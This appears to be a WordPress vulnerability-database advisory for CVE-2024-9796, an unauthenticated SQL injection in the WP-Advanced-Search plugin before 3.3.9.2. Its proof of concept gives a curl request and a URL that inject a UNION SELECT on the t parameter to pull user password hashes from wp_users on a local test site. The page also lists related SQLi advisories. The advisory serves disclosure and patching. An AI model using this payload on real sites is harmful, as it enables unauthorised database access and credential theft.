WP-Advanced-Search < 3.3.9.2 – Unauthenticated SQL Injection | CVE 2024-9796 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape the t parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks

Proof of Concept

curl "https://wordpress.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e"

https://wordpress.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20UNION%20SELECT%20user_pass%20FROM%20wp_users--&f=user_login&type=&e

Affects Plugins

wp-advanced-search

Fixed in 3.3.9.2

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Wojciech Jezowski

Submitter

Wojciech Jezowski

Verified

Yes

WPVDB ID

2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b

Timeline

Publicly Published

2024-09-17 (about 1 year ago)

Added

2024-10-09 (about 1 year ago)

Last Updated

2024-10-10 (about 1 year ago)

Other

Published

Title

Published

2025-03-12

Title

WordPress Report Brute Force Attacks and Login Protection ReportAttacks Plugins < 2.33 - Authenticated (Admin+) SQL Injection

Published

2023-10-18

Title

GeoDirectory < 2.3.29 - Authenticated (Administrator+) SQL Injection via orderby

Published

2022-04-05

Title

Documentor <= 1.5.3 - Unauthenticated SQLi

Published

2024-10-31

Title

Porsline < 1.1 - Contributor+ SQL Injection

Published

2025-05-19

Title

RSVPMarker < 11.5.7 - Authenticated (Contributor+) SQL Injection